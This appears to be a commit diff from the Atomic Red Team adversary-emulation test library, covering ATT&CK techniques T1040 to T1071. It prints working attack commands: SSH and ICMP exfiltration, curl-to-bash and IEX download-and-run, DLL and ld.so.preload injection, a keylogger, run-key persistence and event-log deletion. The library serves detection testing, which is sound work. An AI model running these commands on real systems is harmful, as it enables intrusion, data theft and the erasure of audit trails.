**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | ens33|
#### Run it with `bash`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
@@ -38,6 +39,9 @@ tshark -c 5 -i #{interface}
<br/>
<br/>
@@ -47,12 +51,13 @@ Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCP
**Supported Platforms:** macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | en0A|
#### Run it with `bash`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
@@ -60,6 +65,9 @@ tshark -c 5 -i #{interface}
<br/>
<br/>
@@ -70,12 +78,13 @@ installed, along with WinPCAP. Windump will require the windump executable.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | Ethernet0|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
c:\windump.exe
@@ -83,6 +92,9 @@ c:\windump.exe
<br/>
<br/>
@@ -93,12 +105,13 @@ installed, along with WinPCAP. Windump will require the windump executable.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | Ethernet0|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
& "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
& c:\windump.exe
@@ -106,4 +119,7 @@ installed, along with WinPCAP. Windump will require the windump executable.
<br/>
atomics/T1042/T1042.md
+6 -2
View File
@@ -22,17 +22,21 @@ Change Default File Association From cmd.exe
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| extension_to_change | File Extension To Hijack | String | .wav|
| target_exenstion_handler | Thing To Open | Path | C:\Program Files\Windows Media Player\wmplayer.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
```
<br/>
atomics/T1044/T1044.md
+6 -2
View File
@@ -27,12 +27,13 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| weak_permission_file | check weak files permission | path | GoogleUpdate.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Get-WmiObject win32_service | select PathName
get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}" | FL | findstr "FullControl"
@@ -40,4 +41,7 @@ get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}" | FL | fi
<br/>
atomics/T1046/T1046.md
+11 -3
View File
@@ -19,7 +19,8 @@ Scan ports to check for listening ports
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
for port in {1..65535};
do
@@ -29,6 +30,9 @@ done
<br/>
<br/>
@@ -38,14 +42,15 @@ Scan ports to check for listening ports with Nmap.
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| network_range | Network Range to Scan. | string | 192.168.1.0/24|
| port | Ports to scan. | string | 80|
| host | Host to scan. | string | 192.168.1.1|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
@@ -54,4 +59,7 @@ nc -nv #{host} #{port}
<br/>
atomics/T1047/T1047.md
+33 -9
View File
@@ -27,13 +27,17 @@ WMI List User Accounts
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic useraccount get /ALL
```
<br/>
<br/>
@@ -43,13 +47,17 @@ WMI List Processes
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic process get caption,executablepath,commandline
```
<br/>
<br/>
@@ -59,13 +67,17 @@ WMI List Software
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic qfe get description,installedOn /format:csv
```
<br/>
<br/>
@@ -75,19 +87,23 @@ WMI List Remote Services
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Ip Address | String | 192.168.0.1|
| service_search_string | Name Of Service | String | sql server|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%")
```
<br/>
<br/>
@@ -97,18 +113,22 @@ This test uses wmic.exe to execute a process on the local host.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_to_execute | Name or path of process to execute. | String | calc.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic process call create #{process_to_execute}
```
<br/>
<br/>
@@ -118,17 +138,21 @@ This test uses wmic.exe to execute a process on a remote host.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Ip Address | String | 192.168.0.1|
| process_to_execute | Name or path of process to execute. | String | calc.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic /node:"#{node}" process call create #{process_to_execute}
```
<br/>
atomics/T1048/T1048.md
+24 -11
View File
@@ -31,23 +31,27 @@ Input a domain and test Exfiltration over SSH
Remote to Local
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
**Supported Platforms:** macOS, Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | target SSH domain | url | target.example.com|
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
```
<br/>
<br/>
@@ -56,34 +60,37 @@ Input a domain and test Exfiltration over SSH
Local to Remote
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
**Supported Platforms:** macOS, Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | target SSH domain | url | target.example.com|
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
```
<br/>
<br/>
## Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
**Supported Platforms:** macOS, Linux
#### Run it with these steps!
1. Victim System Configuration:
#### Run it with these steps! 1. Victim System Configuration:
mkdir /tmp/victim-staging-area
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
@@ -101,6 +108,8 @@ A firewall rule (iptables or firewalld) will be needed to allow exfiltration on
<br/>
<br/>
@@ -110,17 +119,21 @@ Exfiltration of specified file over ICMP protocol.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe|
| ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
```
<br/>
atomics/T1048/T1048.yaml
-6
View File
@@ -11,8 +11,6 @@ atomic_tests:
supported_platforms:
- macos
- centos
- ubuntu
- linux
input_arguments:
@@ -43,8 +41,6 @@ atomic_tests:
supported_platforms:
- macos
- centos
- ubuntu
- linux
input_arguments:
@@ -73,8 +69,6 @@ atomic_tests:
supported_platforms:
- macos
- centos
- ubuntu
- linux
executor:
atomics/T1049/T1049.md
+15 -3
View File
@@ -29,7 +29,8 @@ Get a listing of network connections.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
netstat
net use
@@ -38,6 +39,9 @@ net sessions
<br/>
<br/>
@@ -47,13 +51,17 @@ Get a listing of network connections.
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Get-NetTCPConnection
```
<br/>
<br/>
@@ -63,7 +71,8 @@ Get a listing of network connections.
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
netstat
who -a
@@ -71,4 +80,7 @@ who -a
<br/>
atomics/T1050/T1050.md
+14 -6
View File
@@ -19,25 +19,29 @@ Installs A Local Service
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1050\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
```
#### Cleanup Commands:
```
sc.exe stop #{service_name}
sc.exe delete #{service_name}
```
<br/>
<br/>
@@ -47,23 +51,27 @@ Installs A Local Service via PowerShell
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1050\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
```
#### Cleanup Commands:
```
Stop-Service -Name "#{service_name}"
(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()
```
<br/>
atomics/T1053/T1053.md
+25 -9
View File
@@ -24,13 +24,17 @@ Note: deprecated in Windows 8+
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
at 13:20 /interactive cmd
```
<br/>
<br/>
@@ -39,23 +43,27 @@ at 13:20 /interactive cmd
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| task_command | What you want to execute | String | C:\windows\system32\cmd.exe|
| time | What time 24 Hour | String | 72600|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
```
#### Cleanup Commands:
```
SCHTASKS /Delete /TN spawn /F
```
<br/>
<br/>
@@ -65,7 +73,7 @@ Create a task on a remote system
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| task_command | What you want to execute | String | C:\windows\system32\cmd.exe|
@@ -74,17 +82,21 @@ Create a task on a remote system
| user_name | Username DOMAIN\User | String | DOMAIN\user|
| password | Password | String | At0micStrong|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
```
#### Cleanup Commands:
```
SCHTASKS /Delete /TN "Atomic task" /F
```
<br/>
<br/>
@@ -95,7 +107,8 @@ These could be considered "fileless" scheduled task creation.
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
@@ -105,10 +118,13 @@ $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -
Register-ScheduledTask AtomicTask -InputObject $object
```
#### Cleanup Commands:
```
Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
```
<br/>
atomics/T1055/T1055.md
+36 -12
View File
@@ -46,13 +46,14 @@ Windows 10 Utility To Inject DLLS
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055\src\x64\T1055.dll|
| process_id | PID of input_arguments | Int | (get-process spoolsv).id|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING #{dll_payload}
@@ -60,6 +61,9 @@ mavinject $mypid /INJECTRUNNING #{dll_payload}
<br/>
<br/>
@@ -69,13 +73,14 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to Inject | Path | T1055.dll|
| process_id | PID of input_arguments | Int | (get-process spoolsv).id|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$mypid = #{process_id}
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
@@ -83,6 +88,9 @@ Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
<br/>
<br/>
@@ -92,18 +100,22 @@ This test adds a shared library to the `ld.so.preload` list to execute and inter
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_shared_library | Path to a shared library object | Path | ../bin/T1055.so|
#### Run it with `bash`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
echo #{path_to_shared_library} > /etc/ld.so.preload
```
<br/>
<br/>
@@ -113,18 +125,22 @@ This test injects a shared object library via the LD_PRELOAD environment variabl
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_shared_library | Path to a shared library object | Path | /opt/AtomicRedTeam/atomics/T1055/bin/T1055.so|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
LD_PRELOAD=#{path_to_shared_library} ls
```
<br/>
<br/>
@@ -141,18 +157,22 @@ Excercises Five Techniques
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_binary | Output Binary | Path | T1055.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
.\bin\#{exe_binary}
```
<br/>
<br/>
@@ -163,17 +183,21 @@ This works by copying cmd.exe to a file, naming it svchost.exe, then copying a f
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
```
#### Cleanup Commands:
```
del C:\T1055.txt
del C:\svchost.exe
```
<br/>
atomics/T1056/T1056.md
+7 -3
View File
@@ -23,21 +23,25 @@ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/ma
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filepath | Name of the local file, include path. | Path | $env:TEMP\key.log|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
Set-Location $PathToAtomicsFolder
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
```
#### Cleanup Commands:
```
Remove-Item $env:TEMP\key.log
```
<br/>
atomics/T1057/T1057.md
+12 -4
View File
@@ -22,15 +22,16 @@ In Mac and Linux, this is accomplished with the <code>ps</code> command.</blockq
## Atomic Test #1 - Process Discovery - ps
Utilize ps to identify processes
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
**Supported Platforms:** macOS, Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | path of output file | path | /tmp/loot.txt|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
ps >> #{output_file}
ps aux >> #{output_file}
@@ -38,6 +39,9 @@ ps aux >> #{output_file}
<br/>
<br/>
@@ -47,11 +51,15 @@ Utilize tasklist to identify processes
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
tasklist
```
<br/>
atomics/T1057/T1057.yaml
-2
View File
@@ -9,8 +9,6 @@ atomic_tests:
supported_platforms:
- macos
- centos
- ubuntu
- linux
input_arguments:
atomics/T1058/T1058.md
+6 -2
View File
@@ -20,12 +20,13 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePa
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| weak_service_name | weak service check | Registry | weakservicename|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
@@ -33,4 +34,7 @@ get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |F
<br/>
atomics/T1059/T1059.md
+6 -2
View File
@@ -16,10 +16,11 @@ Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is gen
This will download the specified payload and set a marker file in `/tmp/art-fish.txt`.
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"
@@ -27,4 +28,7 @@ bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-
<br/>
atomics/T1059/T1059.yaml
-2
View File
@@ -11,8 +11,6 @@ atomic_tests:
supported_platforms:
- macos
- centos
- ubuntu
- linux
executor:
atomics/T1060/T1060.md
+21 -9
View File
@@ -52,22 +52,26 @@ Run Key Persistence
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
```
#### Cleanup Commands:
```
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
```
<br/>
<br/>
@@ -77,22 +81,26 @@ RunOnce Key Persistence
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
```
#### Cleanup Commands:
```
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
```
<br/>
<br/>
@@ -102,21 +110,25 @@ RunOnce Key Persistence via PowerShell
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | powershell.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
```
#### Cleanup Commands:
```
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
```
<br/>
atomics/T1062/T1062.md
+6 -2
View File
@@ -17,14 +17,15 @@ Create a New-VM
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| hostname | Host to query to see if Hyper-V feature is installed. | string | test-vm|
| vm_name | Create a new VM. | string | testvm|
| file_location | Location of new VHDX file | string | C:\Temp\test.vhdx|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname}
Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools
@@ -33,4 +34,7 @@ New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -Ne
<br/>
atomics/T1063/T1063.md
+20 -4
View File
@@ -32,7 +32,8 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
netsh.exe advfirewall firewall show all profiles
tasklist.exe
@@ -44,6 +45,9 @@ tasklist.exe | findstr /i cylance
<br/>
<br/>
@@ -53,7 +57,8 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
get-process | ?{$_.Description -like "*virus*"}
get-process | ?{$_.Description -like "*carbonblack*"}
@@ -63,6 +68,9 @@ get-process | ?{$_.Description -like "*cylance*"}
<br/>
<br/>
@@ -72,7 +80,8 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
@@ -80,6 +89,9 @@ ps aux | grep CbOsxSensorService
<br/>
<br/>
@@ -89,13 +101,17 @@ Discovery of an installed Sysinternals Sysmon service using driver altitude (eve
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
fltmc.exe | findstr.exe 385201
```
<br/>
<br/>
atomics/T1064/T1064.md
+12 -4
View File
@@ -21,7 +21,8 @@ Creates and executes a simple bash script.
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
@@ -31,6 +32,9 @@ sh /tmp/art.sh
<br/>
<br/>
@@ -40,22 +44,26 @@ Creates and executes a simple batch script.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Command to execute within script. | string | dir|
| script_to_create | Path of script to create. | path | C:\Windows\TEMP\execute.bat|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}
C:\Windows\system32\cmd.exe /Q /c #{script_to_create}
```
#### Cleanup Commands:
```
del #{script_to_create}
```
<br/>
atomics/T1065/T1065.md
+12 -4
View File
@@ -17,19 +17,23 @@ Testing uncommonly used port utilizing PowerShell
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
test-netconnection -ComputerName #{domain} -port #{port}
```
<br/>
<br/>
@@ -39,17 +43,21 @@ Testing uncommonly used port utilizing telnet.
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
telnet #{domain} #{port}
```
<br/>
atomics/T1069/T1069.md
+21 -5
View File
@@ -39,7 +39,8 @@ Permission Groups Discovery
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
dscacheutil -q group
dscl . -list /Groups
@@ -48,6 +49,9 @@ groups
<br/>
<br/>
@@ -57,7 +61,8 @@ Basic Permission Groups Discovery for Windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net localgroup
net group /domain
@@ -65,6 +70,9 @@ net group /domain
<br/>
<br/>
@@ -74,12 +82,13 @@ Permission Groups Discovery utilizing PowerShell
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user | User to identify what groups a user is a member of | string | administrator|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
get-localgroup
get-ADPrincipalGroupMembership #{user} | select name
@@ -87,6 +96,9 @@ get-ADPrincipalGroupMembership #{user} | select name
<br/>
<br/>
@@ -96,7 +108,8 @@ Runs 'net group' command including command aliases and loose typing to simulate
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net group /domai 'Domain Admins'
net groups 'Account Operators' /doma
@@ -106,4 +119,7 @@ net group 'BUILTIN\Backup Operators' /doma
<br/>
atomics/T1070/T1070.md
+39 -11
View File
@@ -43,18 +43,22 @@ Clear Windows Event Logs
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_name | Windows Log Name, ex System | String | System|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
wevtutil cl #{log_name}
```
<br/>
<br/>
@@ -64,13 +68,17 @@ Manages the update sequence number (USN) change journal, which provides a persis
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
fsutil usn deletejournal /D C:
```
<br/>
<br/>
@@ -80,7 +88,8 @@ Delete system and audit logs
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
@@ -88,6 +97,9 @@ rm -rf /private/var/audit/*
<br/>
<br/>
@@ -97,18 +109,22 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of mail spool | String | root|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
echo 0> /var/spool/mail/#{username}
```
<br/>
<br/>
@@ -118,18 +134,22 @@ This test overwrites the specified log. This technique was used by threat actor
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_path | Path of specified log | Path | /var/log/secure|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
echo 0> #{log_path}
```
<br/>
<br/>
@@ -139,19 +159,23 @@ Recommended Detection: Monitor for use of the windows event log filepath in Powe
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
Stop-Process -Id $eventLogId -Force
Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
```
#### Cleanup Commands:
```
Start-Service -Name EventLog
```
<br/>
<br/>
@@ -161,11 +185,15 @@ Clear event logs using built-in PowerShell commands
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
Clear-EventLog -logname Application
```
<br/>
atomics/T1071/T1071.md
+36 -12
View File
@@ -28,12 +28,13 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
